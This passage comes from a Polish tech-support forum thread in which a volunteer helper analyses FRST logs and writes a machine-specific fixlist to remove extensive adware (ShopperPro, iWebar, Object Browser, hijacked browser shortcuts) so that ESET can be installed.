picasso

Proszę o link do tematu prowadzonego na innym forum, link podany tu w temacie a nie na PW. Muszę mieć kompletny obraz sytuacji. Zaprezentuj zrzut ekranu instalatora ESET pokazujący owe "różne antywirusy". W raportach nie widać żadnych równoległych instalacji antywirusów (sterowników czy rejestracji WMI) które mogłyby blokować instalację ESET. Jedyne co widać na liście zainstalowanych, to te pozycje: ==================== Installed Programs ====================== ESET Remote Administrator Console (HKLM\...\{9F00D1CA-CA68-4AAE-B76D-22E627088A61}) (Version: 3.0.39 - ESET, spol s r.o.) Malwarebytes Anti-Malware wersja 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation) Nie widać także jawnych oznak czynnej infekcji (są tylko martwe szczątki adware które nie mają żadnego znaczenia). Ale są tu tak jakby ślady jakiejś infekcji, tzn. widać następujące ukryte pliki udające w nazwach oprogramowanie antywirusowe: [2014-10-10 13:00:23 | 000,000,000 | RHS- | C] () -- C:\Users\Sylwester Sobkowiak\AppData\Local\IObit Apps [2014-10-10 12:59:09 | 000,000,000 | RHS- | C] () -- C:\Program Files\Windows Defender [2014-10-10 12:59:09 | 000,000,000 | RHS- | C] () -- C:\Program Files\Microsoft Security Client [2014-10-10 12:59:08 | 000,000,000 | RHS- | C] () -- C:\Program Files\Trend Micro Installer [2014-10-10 12:59:08 | 000,000,000 | RHS- | C] () -- C:\Program Files\NortonInstaller [2014-10-10 12:59:07 | 000,000,000 | RHS- | C] () -- C:\ProgramData\Trend Micro Installer [2014-10-10 12:59:07 | 000,000,000 | RHS- | C] () -- C:\ProgramData\NortonInstaller Prawdopodobnie są to także obiekty zablokowane przez uprawnienia. 1. Poproszę o dokładniejszy DIR katalogów. Otwórz Notatnik i wklej w nim: CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files\Common Files" CMD: dir /a C:\ProgramData CMD: dir /a "C:\Users\Sylwester Sobkowiak\AppData\Local" CMD: dir /a "C:\Users\Sylwester Sobkowiak\AppData\LocalLow" CMD: dir /a "C:\Users\Sylwester Sobkowiak\AppData\Roaming" CMD: dir /a C:\Windows\system32\drivers ListPermissions: C:\Program Files\Windows Defender ListPermissions: C:\Program Files\ESET ListPermissions: C:\ProgramData\ESET ListPermissions: C:\ProgramData\Symantec Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Dorzuć także logi z Farbar Service Scanner oraz Kaspersky TDSSKiller. Jeśli Kaspersky coś wykryje, ustaw Skip i tylko dostarcz raport.

Istotnie, prawdziwa masakra, ogromna ilość adware. Działania wstępne: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {00aec75d-051f-41a9-9837-e94ac4f56303}Gw64; C:\Windows\System32\drivers\{00aec75d-051f-41a9-9837-e94ac4f56303}Gw64.sys [48784 2014-10-15] (StdLib) R1 {02bbe9df-d3b0-43f4-8dcb-e24500d3308f}Gw64; C:\Windows\System32\drivers\{02bbe9df-d3b0-43f4-8dcb-e24500d3308f}Gw64.sys [48784 2014-10-17] (StdLib) R1 {10e3e2da-8f7b-42cc-9f00-90007ce494b8}Gw64; C:\Windows\System32\drivers\{10e3e2da-8f7b-42cc-9f00-90007ce494b8}Gw64.sys [48832 2014-11-06] (StdLib) R1 {1de2a23f-1c23-4ea1-8ef4-79bc5c5cea78}Gw64; C:\Windows\System32\drivers\{1de2a23f-1c23-4ea1-8ef4-79bc5c5cea78}Gw64.sys [48784 2014-10-13] (StdLib) R1 {255a824a-3cde-4dee-9785-284605606456}Gw64; C:\Windows\System32\drivers\{255a824a-3cde-4dee-9785-284605606456}Gw64.sys [48832 2014-10-29] (StdLib) R1 {32c6b9d7-6b2c-4b03-9178-01abbf9c7194}Gw64; C:\Windows\System32\drivers\{32c6b9d7-6b2c-4b03-9178-01abbf9c7194}Gw64.sys [48784 2014-10-11] (StdLib) R1 {336e37ae-3235-4f16-98ec-8cdf679be7d2}Gw64; C:\Windows\System32\drivers\{336e37ae-3235-4f16-98ec-8cdf679be7d2}Gw64.sys [48784 2014-10-11] (StdLib) R1 {3b808196-ff63-49ee-b33b-efdf51723eca}Gw64; C:\Windows\System32\drivers\{3b808196-ff63-49ee-b33b-efdf51723eca}Gw64.sys [48784 2014-10-13] (StdLib) R1 {3cac76e7-8310-45ea-8277-96d048a78c60}Gw64; C:\Windows\System32\drivers\{3cac76e7-8310-45ea-8277-96d048a78c60}Gw64.sys [48784 2014-11-27] (StdLib) R1 {3fa44d1f-c300-4673-a8c1-5ba05468b4bd}Gw64; C:\Windows\System32\drivers\{3fa44d1f-c300-4673-a8c1-5ba05468b4bd}Gw64.sys [48784 2014-10-17] (StdLib) R1 {4530e639-76ab-4435-889d-a5e81ae090a4}Gw64; C:\Windows\System32\drivers\{4530e639-76ab-4435-889d-a5e81ae090a4}Gw64.sys [48784 2014-10-20] (StdLib) R1 {51b9c91c-8e38-40ae-80de-58a590512b6b}Gw64; C:\Windows\System32\drivers\{51b9c91c-8e38-40ae-80de-58a590512b6b}Gw64.sys [48832 2014-11-10] (StdLib) R1 {5d78e0ee-ca60-46a4-9492-4f24429cc925}Gw64; C:\Windows\System32\drivers\{5d78e0ee-ca60-46a4-9492-4f24429cc925}Gw64.sys [48784 2014-10-17] (StdLib) R1 {67f29abb-07b3-41f5-94cd-f819d7c1fc76}Gw64; C:\Windows\System32\drivers\{67f29abb-07b3-41f5-94cd-f819d7c1fc76}Gw64.sys [48784 2014-10-20] (StdLib) R1 {6c84eb28-66c4-4e3d-8a5a-46ab94f0575a}Gw64; C:\Windows\System32\drivers\{6c84eb28-66c4-4e3d-8a5a-46ab94f0575a}Gw64.sys [48784 2014-10-19] (StdLib) R1 {84e24724-32a5-4ef8-b981-cc669543b4a4}Gw64; C:\Windows\System32\drivers\{84e24724-32a5-4ef8-b981-cc669543b4a4}Gw64.sys [48784 2014-10-11] (StdLib) R1 {949aba83-1d7f-4d0b-b0ba-203450825231}Gw64; C:\Windows\System32\drivers\{949aba83-1d7f-4d0b-b0ba-203450825231}Gw64.sys [48784 2014-10-15] (StdLib) R1 {94c4b27a-8cb1-4214-9d76-87c59a8cf657}Gw64; C:\Windows\System32\drivers\{94c4b27a-8cb1-4214-9d76-87c59a8cf657}Gw64.sys [48784 2014-10-10] (StdLib) R1 {94d62e35-4b43-494c-bf52-ba5935df36ef}Gw64; C:\Windows\System32\drivers\{94d62e35-4b43-494c-bf52-ba5935df36ef}Gw64.sys [48784 2014-12-02] (StdLib) R1 {b0c7827f-c845-429a-833b-c2a798fc4fc3}Gw64; C:\Windows\System32\drivers\{b0c7827f-c845-429a-833b-c2a798fc4fc3}Gw64.sys [48784 2014-10-25] (StdLib) R1 {bb7b7a60-f574-47c2-8a0b-4c56f2da9802}Gw64; C:\Windows\System32\drivers\{bb7b7a60-f574-47c2-8a0b-4c56f2da9802}Gw64.sys [48784 2014-09-24] (StdLib) R1 {c61f6471-95aa-405a-be3a-f3b2dc07fdfa}Gw64; C:\Windows\System32\drivers\{c61f6471-95aa-405a-be3a-f3b2dc07fdfa}Gw64.sys [48784 2014-10-10] (StdLib) R1 {d428f5a9-a362-4938-a8b7-f0abd920078b}Gw64; C:\Windows\System32\drivers\{d428f5a9-a362-4938-a8b7-f0abd920078b}Gw64.sys [48784 2014-12-01] (StdLib) R1 {d997fcb4-42b4-4f84-a147-2e498567c954}Gw64; C:\Windows\System32\drivers\{d997fcb4-42b4-4f84-a147-2e498567c954}Gw64.sys [48784 2014-11-28] (StdLib) R1 {dbec4a38-79aa-4d48-ac2b-d4467b1ded12}Gw64; C:\Windows\System32\drivers\{dbec4a38-79aa-4d48-ac2b-d4467b1ded12}Gw64.sys [48784 2014-11-29] (StdLib) R1 {dc592624-f532-4311-9fc7-6920126fc404}Gw64; C:\Windows\System32\drivers\{dc592624-f532-4311-9fc7-6920126fc404}Gw64.sys [48784 2014-10-22] (StdLib) R1 {e9629596-2cbd-4eea-9329-7470e8b0fdae}Gw64; C:\Windows\System32\drivers\{e9629596-2cbd-4eea-9329-7470e8b0fdae}Gw64.sys [48784 2014-10-12] (StdLib) R1 {f5d136d7-adc2-4c84-85b2-e564334ab0bc}Gw64; C:\Windows\System32\drivers\{f5d136d7-adc2-4c84-85b2-e564334ab0bc}Gw64.sys [48784 2014-10-23] (StdLib) R1 {f63e4e62-e47d-4415-9bb4-c9b1dfe161b9}Gw64; C:\Windows\System32\drivers\{f63e4e62-e47d-4415-9bb4-c9b1dfe161b9}Gw64.sys [48832 2014-11-04] (StdLib) R1 {f9595960-dc6f-49f8-83db-4f3a4c9b714d}Gw64; C:\Windows\System32\drivers\{f9595960-dc6f-49f8-83db-4f3a4c9b714d}Gw64.sys [48784 2014-11-30] (StdLib) R1 {fc7329ef-e953-454c-8e78-ed2cf0acb2ef}Gw64; C:\Windows\System32\drivers\{fc7329ef-e953-454c-8e78-ed2cf0acb2ef}Gw64.sys [48832 2014-10-31] (StdLib) R1 {fce396ae-d8d1-4789-946e-2106fbe4292b}Gw64; C:\Windows\System32\drivers\{fce396ae-d8d1-4789-946e-2106fbe4292b}Gw64.sys [48784 2014-10-18] (StdLib) R1 {fd600559-a688-4110-b9b9-0f1a9beae8ae}Gw64; C:\Windows\System32\drivers\{fd600559-a688-4110-b9b9-0f1a9beae8ae}Gw64.sys [48784 2014-10-12] (StdLib) R2 CltMngSvc; C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe [3320640 2014-12-10] (Client Connect LTD) S2 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [68608 2014-11-01] (globalUpdate) [File not signed] S3 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [68608 2014-11-01] (globalUpdate) [File not signed] R2 IePluginServices; C:\ProgramData\IePluginServices\PluginService.exe [715656 2014-09-24] (Cherished Technololgy LIMITED) R2 MaintainerSvc1.20.7247763; C:\ProgramData\d2446020-ddff-402b-b064-199d2ce66b2b\maintainer.exe [123632 2014-12-25] () S4 servervo; C:\Users\x\AppData\Roaming\VOPackage\VOsrv.exe [89600 2014-11-01] () [File not signed] R2 SPBIUpd; C:\Program Files\Common Files\ShopperPro\spbiu.exe [2346880 2014-12-15] (ShopperPro) R3 SPBIUpdd; C:\Program Files\Common Files\ShopperPro\spbiw.sys [41856 2014-12-15] () R2 SPDRIVER_1.38.0.1425; C:\Program Files (x86)\ShopperPro\JSDriver\1.38.0.1425\jsdrv.sys [52584 2014-12-15] () R2 Update AdvanceElite; C:\Program Files (x86)\AdvanceElite\updateAdvanceElite.exe [524528 2014-12-25] () R2 Util AdvanceElite; C:\Program Files (x86)\AdvanceElite\bin\utilAdvanceElite.exe [524528 2014-12-25] () R2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [485888 2014-12-10] (Fuyu LIMITED) [File not signed] R2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [425136 2014-11-26] (Taiwan Shui Mu Chih Ching Technology Limited.) S3 SPPD; \??\C:\Windows\system32\drivers\SPPD.sys [X] S3 X6va025; \??\C:\Windows\SysWOW64\Drivers\X6va025 [X] Task: {0BE83B61-6300-4422-9CCB-B1CB29286832} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-11 => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-11.exe [2014-11-01] (iWebar) Task: {0FF4251A-68AF-447C-B4E2-56E93883F6C8} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-7 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-7.exe [2014-11-01] (Object Browser) Task: {19659E29-6712-45FF-B287-F859DE374DFD} - System32\Tasks\{E661BCF9-2E50-494B-B2BC-666A617F0CF0} => pcalua.exe -a C:\Users\x\Downloads\adwcleaner_3.310_www.INSTALKI.pl.exe -d C:\Users\x\Downloads Task: {25E61C1D-93DB-4C8B-B245-3A888C1D3168} - System32\Tasks\UNELEVATE_16672 => C:\Program Files (x86)\ShopperPro\JSDriver\1.37.0.1390\jsdrv.exe [2014-11-27] () Task: {281D9AD8-FCD6-4446-9C35-61B6497F298A} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5_user => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5.exe [2014-11-01] (Object Browser) Task: {2C775363-C3F5-4C42-B30B-CA92AEE625FE} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-1 => C:\Program Files (x86)\Object Browser\Object Browser-codedownloader.exe [2014-11-01] (Object Browser) Task: {2D912075-65E0-45CF-B294-456814A41EE2} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-4 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-4.exe [2014-11-01] (Object Browser) Task: {31385B7A-1788-418E-9D19-C1DFE6B8BA61} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-5 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-5.exe [2014-11-01] (Object Browser) Task: {32BC7763-6392-47CA-9B8B-A6DCCCAE15D5} - System32\Tasks\UNELEVATE_9690 => C:\Program Files (x86)\ShopperPro\JSDriver\1.38.0.1425\jsdrv.exe [2014-12-15] () Task: {40C7FB91-56C3-433A-8407-65149486B762} - System32\Tasks\{D40542E4-0F7E-4093-9F21-B83D0E0816E8} => Chrome.exe Task: {4D503498-DD80-4489-B332-E8CDE6C4EA8E} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-2 => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-2.exe [2014-11-01] (iWebar) Task: {517A2ED0-2C51-4D33-A169-889E56ADD658} - System32\Tasks\ShopperPro => C:\Program Files (x86)\ShopperPro\ShopperPro.exe [2014-12-15] (Goobzo LTD) Task: {5D345B26-7D12-43C6-8941-30CF9056A525} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\Program Files\Common Files\System\SysMenu.dll ,Command701 update2 Task: {5F458916-3AA9-4541-A32E-ED0668EF65E6} - System32\Tasks\SPDriver => C:\Program Files (x86)\ShopperPro\JSDriver\1.38.0.1425\jsdrv.exe [2014-12-15] () Task: {61875E24-10E4-4377-A4BD-0D2815BC591A} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-2 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-2.exe [2014-11-01] (Object Browser) Task: {68F6C832-FE13-4FCD-B0C0-E37FABEE2282} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5 => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5.exe [2014-11-01] (iWebar) Task: {6E0A7C25-4C41-4083-B3AB-BD494D556E3E} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-7 => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-7.exe [2014-11-01] (iWebar) Task: {6E71B911-5687-4B25-A955-7AD2F67364D9} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-6 => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-6.exe [2014-11-01] (iWebar) Task: {74DFD4E0-6C1A-4347-AE9E-B7CC6362EC1E} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-4 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-4.exe [2014-11-01] (Object Browser) Task: {7785297A-8A21-43FC-8969-557715044ED1} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2014-08-25] (Goobzo) Task: {86E96A7A-8A48-4E25-830B-A60B9A76EE76} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2014-11-01] (globalUpdate) Task: {8758D5A0-AD2A-477C-8BE0-0F2F971B265F} - System32\Tasks\SMupdate1 => Rundll32.exe C:\Program Files\Common Files\System\SysMenu.dll ,Command701 update1 Task: {8E8F0AF1-F136-4A04-A36E-19D4040BB9E8} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-2 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-2.exe [2014-11-01] (Object Browser) Task: {953AAAD2-F987-4E93-930A-B4BC70476B39} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-1 => C:\Program Files (x86)\iWebar\iWebar-codedownloader.exe [2014-11-01] (iWebar) Task: {9E23DBFD-E312-4EA6-93E1-2C9F877AB0BD} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-11 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-11.exe [2014-11-01] (Object Browser) Task: {9EC05708-4212-4771-B56D-F9DEF6F08E0E} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-6 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-6.exe [2014-11-01] (Object Browser) Task: {AAA25E5F-0A3F-4259-A5A9-74C3E972DD8F} - System32\Tasks\ShopperProJSUpd => C:\Program Files (x86)\ShopperPro\updater.exe [2014-12-15] (Goobzo) Task: {B05DFB33-5230-4CAB-BBEC-1F62F69E850D} - System32\Tasks\UNELEVATE_12860 => C:\Program Files (x86)\ShopperPro\JSDriver\1.37.0.1390\jsdrv.exe [2014-11-27] () Task: {B0AD687C-58DB-4726-87EB-5C984067CAF2} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-6 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-6.exe [2014-11-01] (Object Browser) Task: {B7616895-4964-4435-B471-5CD1CD87DA9E} - System32\Tasks\UNELEVATE_24836 => C:\Program Files (x86)\ShopperPro\JSDriver\1.37.0.1390\jsdrv.exe [2014-11-27] () Task: {B95227F2-672C-4073-AA64-17BF889AA252} - System32\Tasks\SPBIW_UpdateTask_Time_3834333731313338382d50552d6c455a37575a417834 => Wscript.exe //B "C:\ProgramData\ShopperPro\spbihe.js" spbiu.exe /invoke /f:check_services /l:0 Task: {BD5E2698-3EFE-4B42-8A38-F618B54C0281} - System32\Tasks\Opera scheduled Autoupdate 1400945825 => C:\Program Files (x86)\Opera\launcher.exe Task: {C358CEC2-A776-4D5F-910B-B0D9CB71C464} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-4 => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-4.exe [2014-11-01] (iWebar) Task: {C621A8CA-24E1-47BB-A6B1-9CF4E586FDCE} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-1 => C:\Program Files (x86)\Sense\Sense-codedownloader.exe [2014-11-01] (Object Browser) Task: {CEB27992-7E69-435B-8168-3271B03FC442} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5.exe [2014-11-01] (Object Browser) Task: {D0EC5074-7167-4049-B395-69BDA47D6334} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe Task: {D73AB80D-BA81-47FC-B2D0-612970D1CB4D} - System32\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5_user => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5.exe [2014-11-01] (iWebar) Task: {D761CB15-0839-49FE-81AE-C3F9090A0439} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe [2014-11-01] (globalUpdate) Task: {D7BFCA8E-7027-4CAE-B5A2-938B4942FFAE} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-3 => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-3.exe [2014-11-01] (Object Browser) Task: {D8CA7382-0306-42C2-BFAB-D0AF3DFE7BCF} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-7 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-7.exe [2014-11-01] (Object Browser) Task: {DD7145C9-2076-4FEC-BAFD-898BA9FE2FAF} - System32\Tasks\{78BEF649-45B6-4E21-B488-349FE4991B62} => Chrome.exe Task: {DDC0DC86-681D-412B-B5DD-C30A0EF032E1} - System32\Tasks\UNELEVATE_5175 => C:\Program Files (x86)\ShopperPro\JSDriver\1.37.0.1390\jsdrv.exe [2014-11-27] () Task: {EC94C577-092E-4D67-827B-B5744B3451B1} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\Program Files\Common Files\System\SysMenu.dll ,Command701 update3 Task: {F365A03B-C3D5-46D4-BB02-EE1C09BD1A12} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-11 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-11.exe [2014-11-01] (Object Browser) Task: {FB3829E2-BE90-42FE-B3DE-79344630FD08} - System32\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-3 => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-3.exe [2014-11-01] (Object Browser) Task: {FC672F86-E85E-4BD2-A534-84905211CD6E} - System32\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-5_user => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-5.exe [2014-11-01] (Object Browser) Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-1.job => C:\Program Files (x86)\Sense\Sense-codedownloader.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-11.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-11.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-2.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-2.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-3.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-3.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-4.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-4.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5_user.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-5.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-6.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-6.exe Task: C:\Windows\Tasks\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-7.job => C:\Program Files (x86)\Sense\27656fbc-5b32-4b14-a0b3-780d65a1e0a7-7.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-1.job => C:\Program Files (x86)\iWebar\iWebar-codedownloader.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-11.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-11.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-2.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-2.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-4.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-4.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5_user.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-5.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-6.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-6.exe Task: C:\Windows\Tasks\cd4e1855-803e-4703-afaf-a1341ed0cdd8-7.job => C:\Program Files (x86)\iWebar\cd4e1855-803e-4703-afaf-a1341ed0cdd8-7.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-1.job => C:\Program Files (x86)\Object Browser\Object Browser-codedownloader.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-11.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-11.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-2.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-2.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-3.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-3.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-4.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-4.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-5.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-5.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-5_user.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-5.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-6.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-6.exe Task: C:\Windows\Tasks\d141f00e-bc93-4e80-a703-aaa142b02e1e-7.job => C:\Program Files (x86)\Object Browser\d141f00e-bc93-4e80-a703-aaa142b02e1e-7.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1067321925-3578864132-775108078-1000Core.job => C:\Users\x\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1067321925-3578864132-775108078-1000UA.job => C:\Users\x\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files (x86)\globalUpdate\Update\GoogleUpdate.exe HKU\S-1-5-21-1067321925-3578864132-775108078-1000\...\Run: [AtiDriverStart] => C:\Users\x\AppData\Local\ATI Technologies\atidxx.exe GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.delta-homes.com/?type=sc&ts=1418369197&from=wpm12123&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.sweet-page.com/?type=sc&ts=1411567516&from=cor&uid=TOSHIBAXMQ01ABD050_X259C3R4TXXX259C3R4T ShortcutWithArgument: C:\Users\x\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe 